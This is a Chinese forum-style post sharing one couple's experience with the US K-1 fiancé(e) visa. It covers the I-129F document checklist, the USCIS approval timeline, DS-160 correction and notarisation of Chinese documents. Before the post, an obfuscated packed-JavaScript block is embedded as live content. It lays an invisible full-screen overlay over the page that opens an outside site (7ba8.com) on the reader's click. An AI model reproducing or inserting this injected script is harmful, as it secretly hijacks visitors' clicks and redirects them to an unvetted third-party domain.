<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>本人其实新手一枚,但好在有个好姐妹(受益人)08年自己一手操办K1成功,作为私人指导。 前期准备:就是申请人寄出的第一个包裹,我是按照导师给的checklist进行准备的,详细如下:(中文部分是我补充的,不算是翻译,有些个人想法,有翻译错的请包涵指正,谢谢!)1. Payment as required by USCIS. Use apersonal check so you can track the payment. Money Orders are also accepted.Read the Guide to Paying USCIS Immigration Fees.支票,使用个人支票可以查询支票是否被接收2. Cover Letter (see example). Should include a description of whatyour are petitioning for (I-129F), a table of contents (list everything in thepacket). If you need additional room to explain your case, attach a separatesheet (list the attachment on the cover sheet). Make sure to sign and date thecover sheet.封面,列出你此份资料的所有项目,可在tigtag找样本3. Form I-129F: Petition for Alien Fiance(e)(see example) 129F主申请表,tigtag站里和这个网站都有示例,大家自己看吧4. Declaration of how you met in person inthe last two years. This should be a single typed page attachment regardingquestion '34.a' of the I-129F. Make sure to sign and date it. 这个我叫爱情故事,就是描述你们怎么认识,还有过去两年的事。其实也是129F的问题34a,标题可以用34a的问题,建议一定要附另外的纸写,总不会129表里的两行字就能写清楚你们的故事吧5. Original statements (from both the US Citizen and foreign fiance)certifying an intent to marry within 90 days of entering the US on a valid K-1.(see example)两人的结婚意愿书,请看示例。需要注意的是:国内的受益人需要亲笔签字,然后国内通用A4纸美国通用信纸尺寸,所以需要亲笔签字的大家都要注意这个细节哦!6. Proof of having met in past two years. (click here for examples)个人感觉这个是很关键的文件,按原文的说法是提供尽可能多的东西,一个是避免申请人接到文件补充要求,一个是有利于领事馆在未联系受益人前更深入的了解到受益人。这里还写到领事馆是带着怀疑的眼光,现在回想起来我准备的这个大文件(第一次交110多页)应该是起到很大的作用。最后我单独讲讲我怎么准备的这个文件吧。以下是原文的解释Documentary Proof of Having Met inPerson in the Past Two Years and an Ongoing Relationship:
Use as many of these items are possible. There is no minimum,but the more you can provide the less likely you are that you will receive anRFE. Additionally, please note that providing proof of your ongoing and genuinerelationship in this package may benefit you by allowing the consulate to haveaccess to this information prior to them formally contacting the non US Citizenfiance. Many high risk consulates approach cases with a skeptical eye andproviding this information early on in the original I-129F package will helpthem in their preliminary review of your case. 1) Copies of all airline boarding passes, train passes,itineraries, hotel receipts, passport stamps (make sure you can read the dateson the stamps), and other documentary evidence that you have met within thelast two years. You may want to highlight or place post-it notes indicating thedates and locations on the copies (to make the adjudication easier) for theperson reviewing your file.2) Color Photo's of you and your fiance(e) together. Makesure you write your names, date, and location on the back of every photo.Provide two to five photo's. If you only have a single copy of the photo, thenmake a color copy and send that. If it is a digital photo, have it printed at alocal photo store such as Walgreens (if at all possible) or if not on a highquality printer. Place photo's in a plastic bag or photo sheet and label thesheet. Note that you may not receive originals of photo's back.3) The following items will not typically show proof ofhaving met in the last two years however will show proof of an ongoingrelationship: Copies of land line and cell phone bills, appropriate letters andemails, stamps on the letters (to document the date they were sent), and otherwritten documentary proof. Provide a reasonable amount; two to four of eachtype. Pick a range of dates up to and including the present. You can alsoinclude a copy of engagement ring receipt (this is something that is a bigoptional - do not worry if you do not have a ring yet!)7. G-325A filled out by the US Citizen withtheir information, signed and dated (see example). 申请人的G-325A表8. One passport-type photo (see specification) of the US Citizen. Write the full nameof the US citizen on the back. Place in a plastic bag and label the bag"Photo of ". Attach the bag to a sheet of paperand place behind the corresponding G-325a. 申请人的护照相片,照片后写名字,放在塑料袋并标签9. G-325A filled out by the foreign fiance(e)with their information, signed and dated (see example).受益人的G-325A10. One passport-type photo (see specification) of the foreign fiance(e). Write the fullname of the foreign fiance(e) on the back. Place in a plastic bag and label thebag "Photo of (insert foreign fiance(e) name) ". Attach the bag to a sheet of paperand place behind the corresponding G-325a. 受益人的护照相片,做法同811. Copy of the Birth certificate (front andback) for the US Citizen or a copy of ALL pages of the US Citizen'spassport issued with a validity of at least 5 years or a copy of the US Citizen's naturalizationcertificate (front and back). This is used to establish citizenship. 美国公民的出生证明或者护照所有页或者移民证明的复印件,当时我导师建议拿去图书馆或律师行等可公证的地方复印公证,增加可信度和诚意,美国公证很简单快捷,复印后盖章即取。12. Copy of final Divorce Decree(s) orCertificate(s) for the US Citizen and/or foreign fiance(e) if either has beenpreviously married. If the previous marriage of the US Citizen and/or foreign fiance(e) ended due to the deathof their spouse then include a Copy of Death Certificate(s) documenting thatfact. 申请人的既往婚史结束证明13. Proof of Legal Name Change if either theUS Citizen and/or foreign fiance(e) is using a name otherthan that shown on the relevant documents. You must give USCIS copies of thelegal documents that made the change, such as a marriage certificate, adoptiondecree or court order. 申请人的曾用名证明,12、13也可以复印公证14. In regards to Section C Question 2, ifapplicable provide certified copies of all court and police records showing thecharges and dispositions for any specified conviction(s) (in accordance withthe IMBRA). See section 9 of the I-129f instructions for more information. 3月6日,未婚夫在美国正式寄出资料,资料如上,导师当时建议用UPS或USPS等可查询的快递寄出
大约3月19日,收到I-797C Notice of Action,其中显示其收到我未婚夫包裹是3月7日,并且给了个WAC1234567890(例子)号码用于查询,之后是可以在网上查询到进程
4月11号,申请人收到来自USCIS [email protected]>email,说批准了I129F并转交至NVC(National Visa Center),并于4月10日发了I-797,Notice of Action,但是纸质信件好像是一周才收到的。
On April 10, 2014, we mailed you a notice that we haveapproved this I129F PETITION FOR FIANCE(E). Please follow any instructions onthe notice. If you move before you receive the notice, call customer service at1-800-375-5283.
For approved applications/petitions, post-decision activitymay include USCIS sending notification of the approved application/petition tothe National Visa Center or the Department of State.
5月8日,受益人收到广州领馆的信,要求完成DS-160然后打印确认信连同护照复印件、两张2*2英寸的照片、领馆寄来的信一齐寄回。个人感觉建议,应该用EMS好过顺丰,因为EMS是领馆用于寄出的承运商,一般快递对于大客户都有专人服务,也就是说EMS可能有人在领馆驻点服务(后来面试时是看到EMS的人在安检那里可能是驻点可能是送取件)。不管怎样,EMS出入肯定比其他快递便捷。以上纯属个人行业见解哈 在收到以上信后,我到当地公证处了解公证流程和时间,答复是出证起码10个工作日,由于我5月底和6月初要外出一段时间,于是我开始准备出生、婚史、无犯罪的证明和公证。单身证明到民政局开;出生应该父母有出生证明小本没有的话咨询下公证处,告诉是美国签证他们就都知道怎么做的了;无犯罪比较麻烦,需要拿着公证处开的查询函到所属派出所开,再三证一起交给公证处。如果你当地的公证处出证比较快,也可以收到下一步通知(Email)再去公证。我要求的是一式三份的公证,这好像是在哪里看的,最好三份,具体现在只用到一份。 5月15日,受益人下午收到广领馆电话,说我DS-160有个地方填错了,其实是一个很低级的错误,把fiance(e)一栏填成自己,应该填申请人。重新填写一份新的,打印确认信再寄。重新填写也有之前那份的记录,不用从零开始很快完成 |